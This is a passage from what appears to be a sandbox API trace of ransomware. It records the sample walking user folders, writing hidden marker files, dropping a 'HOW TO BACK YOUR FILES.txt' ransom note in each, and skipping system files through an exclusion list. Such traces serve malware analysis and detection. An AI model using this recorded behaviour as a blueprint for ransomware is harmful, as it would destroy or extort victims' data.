FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.865] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.865] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.866] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.866] CloseHandle (hObject=0x2b8) returned 1 [0057.866] CloseHandle (hObject=0x2c4) returned 1 [0057.866] GetCurrentThreadId () returned 0xfa8 [0057.866] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66308 [0057.866] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" [0057.866] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0057.866] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66300 | out: hHeap=0xc50000) returned 1 [0057.866] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer" [0057.866] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\" [0057.866] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3" [0057.866] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.870] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.872] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.873] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.874] CloseHandle (hObject=0x2c4) returned 1 [0057.874] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer") returned 93 [0057.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.874] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x878353ac, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0057.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.874] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.874] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.874] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.874] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c61d87, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6cd5b, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x878353ac, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.875] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.875] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.875] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.875] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.875] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.875] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x878353ac, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x878353ac, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x878353ac, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.875] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.875] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.875] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6f48d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aa.online-metrix.net", cAlternateFileName="AAONLI~1.NET")) returned 1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="Tiger4444.exe") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2=".") returned 1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="..") returned 1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="windows") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="bootmgr") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="pagefile.sys") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="boot") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="ids.txt") returned -1 [0057.875] lstrcmpiW (lpString1="aa.online-metrix.net", lpString2="NTUSER.DAT") returned -1 [0057.875] lstrcpyW (in: lpString1=0x30aeb64, lpString2="aa.online-metrix.net" | out: lpString1="aa.online-metrix.net") returned="aa.online-metrix.net" [0057.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0057.875] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xe6) returned 0xc867d8 [0057.875] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0057.875] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c6f48d, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aa.online-metrix.net", cAlternateFileName="AAONLI~1.NET")) returned 0 [0057.875] FindClose (in: hFindFile=0xc73048 | out: hFindFile=0xc73048) returned 1 [0057.875] lstrcpyW (in: lpString1=0x30aeb64, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.875] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.877] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.877] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.877] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.877] CloseHandle (hObject=0x2b8) returned 1 [0057.878] CloseHandle (hObject=0x2c4) returned 1 [0057.878] GetCurrentThreadId () returned 0xfa8 [0057.878] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0057.878] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" [0057.878] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc867d8 | out: hHeap=0xc50000) returned 1 [0057.878] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0057.878] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net" [0057.878] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\" [0057.878] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" [0057.878] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.879] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.882] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.883] CloseHandle (hObject=0x2c4) returned 1 [0057.883] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net") returned 114 [0057.883] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.883] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x878353ac, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0057.884] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.884] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.884] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.884] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.884] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6cd5b, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c6f48d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x878353ac, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.884] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.884] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.884] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.884] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.884] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.884] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x878353ac, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x878353ac, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8785b882, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.884] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.884] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.884] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c903f8, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fpc.swf", cAlternateFileName="")) returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="Tiger4444.exe") returned -1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2=".") returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="..") returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="windows") returned -1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="bootmgr") returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="pagefile.sys") returned -1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="boot") returned 1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="ids.txt") returned -1 [0057.884] lstrcmpiW (lpString1="fpc.swf", lpString2="NTUSER.DAT") returned -1 [0057.884] lstrcpyW (in: lpString1=0x30aeb8e, lpString2="fpc.swf" | out: lpString1="fpc.swf") returned="fpc.swf" [0057.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0057.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xf6) returned 0xc612d8 [0057.884] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc664c8 [0057.884] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c903f8, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fpc.swf", cAlternateFileName="")) returned 0 [0057.884] FindClose (in: hFindFile=0xc72f08 | out: hFindFile=0xc72f08) returned 1 [0057.884] lstrcpyW (in: lpString1=0x30aeb8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.885] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.886] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.886] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.887] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.887] CloseHandle (hObject=0x2b8) returned 1 [0057.887] CloseHandle (hObject=0x2c4) returned 1 [0057.887] GetCurrentThreadId () returned 0xfa8 [0057.887] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0057.887] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" [0057.887] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0057.887] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0057.887] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf" [0057.887] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\" [0057.887] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3" [0057.887] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\xcvudunh\\#appcontainer\\aa.online-metrix.net\\fpc.swf\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.888] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.890] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.891] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.891] CloseHandle (hObject=0x2c4) returned 1 [0057.892] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf") returned 122 [0057.892] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.892] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\XCVUDUNH\\#AppContainer\\aa.online-metrix.net\\fpc.swf\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6c6f48d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c903f8, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8785b882, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0057.892] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.892] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.892] lstrcmpiW (lpString1=".", 